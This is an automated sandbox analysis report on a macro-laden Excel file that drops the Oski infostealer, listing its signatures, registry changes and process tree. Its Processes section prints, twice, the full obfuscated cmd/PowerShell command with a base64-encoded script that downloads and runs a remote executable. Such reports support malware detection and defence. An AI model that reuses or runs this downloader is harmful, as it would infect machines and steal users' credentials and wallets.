Malware Analysis Report

2025-06-16 03:09

Sample ID 210806-b772dyay8s
Target SAMPLE ORDER .xls
SHA256 78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649
Tags
macro oski infostealer spyware suricata
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649

Threat Level: Known bad

The file SAMPLE ORDER .xls was found to be: Known bad.

Malicious Activity Summary

macro oski infostealer spyware suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

Process spawned unexpected child process

Oski

Downloads MZ/PE file

Suspicious Office macro

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Office loads VBA resources, possible macro or embedded object present

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-08-06 13:54

Signatures

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-06 13:54

Reported

2021-08-06 13:59

Platform

win7v20210410

Max time kernel

122s

Max time network

164s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

Signatures

Oski

infostealer oski

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 824 set thread context of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\lzzn.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1304 wrote to memory of 1628 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 1628 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 1628 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1304 wrote to memory of 1628 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1628 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1628 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1628 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1628 wrote to memory of 760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 760 wrote to memory of 824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 760 wrote to memory of 824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 760 wrote to memory of 824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 556 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOWErsHeLL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\schtasks.exe

